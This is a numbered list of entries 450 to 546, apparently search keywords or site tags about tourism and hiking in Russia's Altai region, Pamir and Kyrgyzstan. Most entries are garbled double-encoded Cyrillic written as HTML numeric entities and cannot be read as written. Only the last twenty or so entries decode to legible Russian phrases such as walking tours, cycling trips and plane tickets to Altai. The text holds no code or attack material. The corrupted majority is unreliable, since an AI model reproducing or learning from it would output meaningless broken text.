  450. &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1112;&#1056;°&#1057;&#1026;&#1057;&#8364;&#1057;&#1026;&#1057;&#1107;&#1057;&#8218; 77 &#1057;&#8218;&#1056;µ&#1056;»&#1056;µ&#1057;&#8224;&#1056;&#1108;&#1056;&#1109;&#1056;µ
  451. &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  452. &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;±
  453. &#1056;±&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;» &#1056;°&#1056;»&#1056;&#1112;&#1056;°&#1057;&#8218;&#1057;&#8249; &#1057;&#8224;&#1056;µ&#1056;&#1029;&#1056;° &#1056;±&#1056;&#1105;&#1056;»&#1056;µ&#1057;&#8218;&#1056;°
  454. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  455. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1029;&#1056;° &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1057;&#8225;&#1056;&#1105;&#1056;
  456. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;/
  457. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#1027;&#1056;&#1105;&#1056;&#1111;&#1056;µ&#1056;&#1169; jamis
  458. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#1027;&#1056;&#1105;&#1056;&#1111;&#1056;µ&#1056;&#1169;&#1056;&#1029;&#1056;°&#1057;&#1039; &#1056;&#1108;&#1057;&#1026;&#1057;&#1107;&#1056;&#1110;&#1056;&#1109;&#1057;&#1027;&#1056;&#1030;&#1056;µ&#1057;&#8218;&#1056;&#1108;&#1056;°
  459. &#1056;&#1030;&#1056;µ&#1057;&#8240;&#1056;&#1105; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  460. &#1056;&#1110;&#1056;&#1109;&#1057;&#1027;&#1057;&#8218;&#1057;&#1034; BBCode &#1056;&#1030;&#1056;&#1108;&#1056;»&#1057;&#1035;&#1057;&#8225;&#1056;µ&#1056;&#1029;
  461. &#1056;&#1169;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1110;&#1056;° &#1056;&#1029;&#1056;° &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1056;&#1032;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  462. &#1056;&#1169;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1110;&#1056;° &#1056;&#1029;&#1056;° &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  463. &#1056;&#1169;&#1057;&#1026;&#1056;°&#1056;&#1110;
  464. &#1056;·&#1056;°&#1056;&#1112;&#1057;&#8225;&#1056;°&#1056;»&#1056;&#1109;&#1056;&#1030; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  465. &#1056;&#1105;&#1056;&#1112;&#1056;µ&#1056;&#1029;&#1056;&#1105;&#1056;&#1029;&#1056;&#1029;&#1056;&#1105;&#1056;&#1108;&#1056;&#1105; &#1056;&#1112;&#1056;°&#1057;&#1039;
  466. &#1056;&#1108;&#1056;°&#1056;&#1108; &#1056;&#1111;&#1056;&#1109;&#1057;&#1027;&#1057;&#8218;&#1057;&#1026;&#1056;&#1109;&#1056;&#1105;&#1057;&#8218;&#1057;&#1034; &#1056;&#1105;&#1056;·&#1056;±&#1057;&#1107; &#1056;&#1111;&#1056;&#1109; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1029;&#1056;°&#1056;&#1112; &#1057;&#1027;&#1056;&#1030;&#1056;µ
  467. &#1056;&#1108;&#1056;°&#1057;&#1026;&#1056;&#1110;&#1056;µ&#1056;&#1112;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1057;&#1026;&#1056;&#1109;&#1057;&#1026;&#1057;&#8249;&#1056;&#1030;
  468. &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;&#1030; &#1056;&#1116;&#1056;&#1109;&#1056;&#1030;&#1056;&#1109;&#1057;&#1027;&#1056;&#1105;&#1056;±&#1056;&#1105;&#1057;&#1026;&#1057;&#1027;&#1056;&#1108;
  469. &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;&#1056;° &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;
  470. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#8216;&#1056;&#1109;&#1057;&#8218;&#1056;&#1105;&#1056;&#1029;&#1056;&#1108;&#1056;&#1105;
  471. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  472. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1111;&#1056;&#1109; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1057;&#1035; &#1056;&#1109;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218;&#1057;&#8249;
  473. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;
  474. &#1056;&#1108;&#1057;&#1107;&#1056;&#1169;&#1056;°&#1057;&#8218;&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;»
  475. &#1056;&#1108;&#1057;&#1107;&#1057;&#8364;&#1056;°&#1056;&#1110;&#1056;°&#1057;&#8225;
  476. &#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1029;&#1057;&#1107;&#1056;»&#1056;° &#1057;&#1027;&#1056;&#1111;&#1056;&#1105;&#1057;&#8224;&#1056;°
  477. &#1056;&#1029;&#1056;°&#1056;±&#1056;&#1105;&#1057;&#1026;&#1056;°&#1057;&#1035; &#1056;&#1110;&#1057;&#1026;&#1057;&#1107;&#1056;&#1111;&#1056;&#1111;&#1057;&#1107; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; 2008
  478. &#1056;&#1029;&#1056;°&#1056;»&#1056;&#1109;&#1056;±&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8222;&#1056;&#1109;&#1056;&#1029;&#1056;°&#1057;&#1026;&#1056;&#1105;&#1056;&#1108; &#1057;&#1036;&#1056;&#1029;&#1056;µ&#1057;&#1026;&#1056;&#1169;&#1056;¶&#1056;°&#1056;&#8470;&#1056;·&#1056;µ&#1057;&#1026;
  479. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  480. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1057;&#1026;&#1056;°&#1056;±&#1056;&#1109;&#1057;&#8225;&#1056;µ&#1056;&#1110;&#1056;&#1109; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;»&#1056;°
  481. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1057;&#1026;&#1056;°&#1056;±&#1056;&#1109;&#1057;&#8225;&#1056;µ&#1056;&#1110;&#1056;&#1109; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;»&#1056;° &#1057;&#1027; &#1056;&#1114;&#1056;&#1105;&#1057;&#8364;&#1056;&#1108;&#1056;°&#1056;&#1112;&#1056;&#1105; &#1056;
  482. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;&#1029;&#1056;° &#1057;&#1026;&#1056;°&#1056;±&#1056;&#1109;&#1057;&#8225;&#1056;&#1105;&#1056;&#8470; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;» &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1057;&#8249; &#1056;&#1119;&#1056;°&#1056;&#1112;&#1056;&#1105;&#1057;&#1026;&#1056;°
  483. &#1056;&#1109;&#1056;&#1169;&#1056;µ&#1056;¶&#1056;&#1169;&#1056;° &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;°
  484. &#1056;&#1109;&#1056;&#1169;&#1056;¶&#1056;µ&#1056;&#1169;&#1056;° &#1056;&#1105; &#1056;&#1109;&#1056;±&#1057;&#1107;&#1056;&#1030;&#1057;&#1034; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;µ
  485. &#1056;&#1109;&#1056;&#1108;&#1057;&#1107;&#1056;&#1029;&#1057;&#8216;&#1056;&#1030;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1109;&#1056;·&#1057;&#8216;&#1057;&#1026;&#1056;°
  486. &#1056;&#1109;&#1057;&#8218; &#1056;&#65533;&#1056;&#1029;&#1057;&#1039; &#1056;&#1169;&#1056;&#1109; &#1056;&#1118;&#1057;&#1035;&#1056;&#1029;&#1056;&#1110;&#1057;&#1107;&#1057;&#1026;&#1056;°
  487. &#1056;&#1109;&#1057;&#8218;&#1056;&#1169;&#1057;&#8249;&#1057;&#8230; &#1056;&#1029;&#1056;° &#1056;&#1109;&#1056;&#1108;&#1057;&#1107;&#1056;&#1029;&#1057;&#8216;&#1056;&#1030;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1057;&#8230; &#1056;&#1109;&#1056;·&#1057;&#8216;&#1057;&#1026;&#1056;°&#1057;&#8230;
  488. &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;» &#1056;&#1108;&#1056;°&#1057;&#1039;&#1056;&#1029;&#1057;&#8225;&#1056;°
  489. &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;» &#1057;&#8218;&#1056;µ&#1056;&#1111;&#1056;»&#1057;&#8249;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1035;&#1057;&#8225;
  490. &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1111;&#1057;&#1026;&#1056;°&#1056;&#1030;&#1056;° &#1057;&#8225;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;· &#1056;°&#1057;&#1026;&#1056;&#1110;&#1057;&#1107;&#1057;&#8218; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  491. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1029;&#1056;° &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;°&#1056;»&#1057;&#1034;&#1056;&#1112;&#1056;°&#1056;&#1105;&#1057;&#1026;
  492. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1029;&#1056;° &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  493. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  494. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1113;&#1056;°&#1057;&#1026;&#1056;°&#1056;&#1110;&#1056;µ&#1056;&#1112;-&#1056;&#1106;&#1057;&#1026;&#1056;&#1110;&#1057;&#1107;&#1057;&#8218;-&#1056;&#1113;&#1056;°&#1057;&#8218;&#1057;&#1107;&#1056;&#1029;&#1057;&#1034;
  495. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1030; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  496. &#1056;&#1111;&#1056;&#1109;&#1056;&#1169;&#1056;±&#1056;&#1109;&#1057;&#1026; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1109;&#1056;&#1030; &#1056;&#1029;&#1056;° &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;µ
  497. &#1056;&#1111;&#1056;&#1109;&#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1057;&#8225;&#1056;&#1105;&#1056;&#1108; &#1056;&#1029;&#1056;° &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  498. &#1056;&#1111;&#1056;&#1109;&#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1057;&#8225;&#1056;&#1105;&#1056;&#1108;&#1056;&#1105; 2008 &#1056;&#1110;&#1056;&#1109;&#1056;&#1169;&#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;&#1057;&#8230;&#1056;°&#1056;&#1108;&#1056;°&#1057;&#1027;&#1056;&#1105;&#1057;&#1039;
  499. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; 2008
  500. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;µ&#1056;&#1029;&#1056;&#1108;&#1056;&#1105; &#1057;&#1027; &#1056;°&#1056;&#1108;&#1056;&#1108;&#1056;&#1109;&#1057;&#1026;&#1056;&#1169;&#1056;°&#1056;&#1112;&#1056;&#1105;
  501. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;&#1029;&#1056;&#1105;
  502. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;&#1029;&#1056;&#1105;
  503. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1029;&#1056;° &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; 2008 &#1056;»&#1056;µ&#1057;&#8218;&#1056;&#1109;
  504. &#1056;&#1111;&#1056;&#1109;&#1057;&#8225;&#1056;µ&#1056;&#1112;&#1057;&#1107; &#1057;&#8218;&#1056;µ&#1056;&#1111;&#1056;»&#1056;&#1109; &#1056;&#1030; &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;°&#1057;&#8230;
  505. &#1056;&#1111;&#1057;&#1026;&#1056;&#1105;&#1056;&#1110;&#1056;»&#1056;°&#1057;&#8364;&#1056;°&#1057;&#1035; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1057;&#8230;&#1056;°&#1056;&#1108;&#1056;°&#1057;&#1027;&#1056;&#1105;&#1057;&#1039;
  506. &#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;µ&#1057;&#1027;&#1057;&#8218;&#1056;&#1030;&#1056;&#1105;&#1056;µ &#1056;&#1030; &#1057;&#1107;&#1056;·&#1056;±&#1056;µ&#1056;&#1108;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;°&#1056;&#1029; &#1056;&#1109;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218;
  507. &#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;µ&#1057;&#1027;&#1057;&#8218;&#1056;&#1030;&#1056;&#1105;&#1056;µ &#1056;&#1029;&#1056;° &#1056;&#1112;&#1056;°&#1057;&#8364;&#1056;&#1105;&#1056;&#1029;&#1056;µ &#1056;&#1105;&#1056;· &#1056;&#1118;&#1056;°&#1057;&#8364;&#1056;&#1108;&#1056;µ&#1056;&#1029;&#1057;&#8218;&#1056;°
  508. &#1057;&#1026;&#1056;°&#1057;&#1027;&#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1057;&#1039;&#1056;&#1029;&#1056;&#1105;&#1056;µ &#1056;&#8216;&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;»-&#1056;&#8220;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1056;&#1109;&#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;&#1057;&#1027;&#1056;&#1108;
  509. &#1057;&#1026;&#1056;µ&#1056;&#1110;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1057;&#1026;&#1056;°&#1057;&#8224;&#1056;&#1105;&#1057;&#1039; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  510. &#1057;&#1026;&#1057;&#1035;&#1056;&#1108;&#1056;·&#1056;°&#1056;&#1108; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1169;&#1056;µ&#1056;&#1030;&#1057;&#1107;&#1057;&#8364;&#1056;&#1108;&#1056;&#1105;
  511. &#1057;&#1027;&#1056;µ&#1056;&#1112;&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;» &#1056;&#1032;&#1057;&#1027;&#1057;&#8218;&#1057;&#1034;-&#1056;&#1113;&#1056;°&#1056;&#1029;
  512. &#1057;&#1027;&#1056;&#1108;&#1056;°&#1057;&#8225;&#1056;°&#1057;&#8218;&#1057;&#1034; &#1056;±&#1056;µ&#1057;&#1027;&#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1029;&#1056;&#1109; &#1057;&#1026;&#1056;°&#1057;&#1027;&#1057;&#1027;&#1056;&#1108;&#1056;°&#1056;· &#1056;&#1109; &#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;
  513. &#1057;&#1027;&#1057;&#8218;&#1057;&#1026;&#1056;°&#1056;&#1029;&#1056;&#1029;&#1056;&#1105;&#1056;&#1108; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1111;&#1056;&#1109;&#1056;&#1105;
  514. &#1057;&#8218;&#1056;°&#1056;&#1112;&#1056;&#1109;&#1056;¶&#1056;&#1029;&#1057;&#1039; &#1056;&#1030; &#1057;&#8225;&#1056;µ&#1057;&#1026;&#1056;&#1029;&#1057;&#1039;&#1056;µ&#1056;&#1030;&#1056;&#1108;&#1056;µ
  515. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026; &#1056;&#1029;&#1056;° &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1056;&#1032;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  516. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;
  517. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; &#1056;&#1105; &#1057;&#1035;&#1056;&#1112;&#1056;&#1109;&#1057;&#1026;
  518. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;
  519. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1056;&#8216;&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;»
  520. &#1057;&#1107;&#1056;·&#1056;±&#1056;µ&#1056;&#1108;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;°&#1056;&#1029; &#1056;&#1110;.&#1056;°&#1056;&#1029;&#1056;&#1110;&#1057;&#1026;&#1056;µ&#1056;&#1029;
  521. &#1057;&#8222;&#1056;&#1109;&#1057;&#1026;&#1057;&#1107;&#1056;&#1112; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  522. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  523. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1057;&#1027; &#1057;&#1027;&#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#8470; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  524. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1109;&#1056;&#1030;
  525. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1057;&#1027; &#1057;&#1027;&#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#8470; &#1056;&#1030; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  526. &#1057;&#1035;&#1056;&#1112;&#1056;&#1109;&#1057;&#1026; &#1057;&#1026;&#1057;&#1035;&#1056;&#1108;&#1056;·&#1056;°&#1056;&#1108;
  527. &#1057;&#1035;&#1056;&#1112;&#1056;&#1109;&#1057;&#1026; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;° &#1057;&#1026;&#1057;&#1035;&#1056;&#1108;&#1056;·&#1056;°&#1056;&#1108;
  528. &#1057;&#1072;&#1081;&#1090; &#1080; &#1092;&#1086;&#1088;&#1091;&#1084; &#1054;&#1082;&#1091;&#1085;&#1077;&#1074;&#1089;&#1082;&#1086;&#1077; &#1086;&#1079;&#1077;&#1088;&#1086;
  529. &#1057;&#1072;&#1088;&#1099;-&#1058;&#1072;&#1096; &#1055;&#1072;&#1084;&#1080;&#1088;
  530. &#1057;&#1082;&#1072;&#1091;&#1090;
  531. &#1058;&#1077;&#1087;&#1083;&#1099;&#1081; &#1082;&#1083;&#1102;&#1095;
  532. &#1058;&#1103;&#1075;&#1091;&#1085; &#1040;&#1083;&#1090;&#1072;&#1081;&#1089;&#1082;&#1080;&#1081; &#1082;&#1088;&#1072;&#1081; - &#1083;&#1099;&#1078;&#1080;
  533. &#1064;&#1077;&#1073;&#1072;&#1083;&#1080;&#1085;&#1086;
  534. &#1070;&#1084;&#1086;&#1088; &#1074; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;&#1077;
  535. &#1072;&#1083;&#1090;&#1072;&#1081;-&#1087;&#1077;&#1096;&#1077;&#1093;&#1086;&#1076;&#1085;&#1099;&#1077; &#1087;&#1086;&#1093;&#1086;&#1076;&#1099;
  536. &#1073;&#1080;&#1083;&#1077;&#1090; &#1085;&#1072; &#1089;&#1072;&#1084;&#1086;&#1083;&#1077;&#1090; &#1040;&#1083;&#1090;&#1072;&#1081;
  537. &#1074;&#1077;&#1083;&#1086;&#1086;&#1076;&#1077;&#1078;&#1076;&#1072;
  538. &#1074;&#1077;&#1083;&#1086;&#1089;&#1080;&#1087;&#1077;&#1076;&#1085;&#1099;&#1081; &#1087;&#1086;&#1093;&#1086;&#1076;
  539. &#1075;&#1072;&#1079; 66
  540. &#1075;&#1080;&#1076;&#1088;&#1086;&#1084;&#1077;&#1090;&#1094;&#1077;&#1085;&#1090;&#1088;
  541. &#1075;&#1086;&#1088;&#1072; &#1055;&#1072;&#1084;&#1080;&#1088; &#1086;&#1073;&#1086;&#1080; &#1085;&#1072; &#1088;&#1072;&#1073;&#1086;&#1095;&#1080;&#1081; &#1089;&#1090;&#1086;&#1083;
  542. &#1075;&#1086;&#1088;&#1085;&#1099;&#1081; &#1072;&#1083;&#1090;&#1072;&#1081; &#1087;&#1083;&#1072;&#1090;&#1086; &#1091;&#1082;&#1086;&#1082; &#1090;&#1091;&#1088;
  543. &#1076;&#1078;&#1072;&#1079;&#1072;&#1090;&#1086;&#1088;
  544. &#1079;&#1055;&#1058;&#1065; &#1073;&#1052;&#1060;&#1041;&#1057;
  545. &#1080;&#1079;&#1076;&#1077;&#1083;&#1080;&#1103;
  546. &#1082;&#1080;&#1088;&#1075;&#1080;&#1079;&#1080;&#1103; &#1080;&#1089;&#1089;&#1099;&#1082;&#1091;&#1083;&#1100;
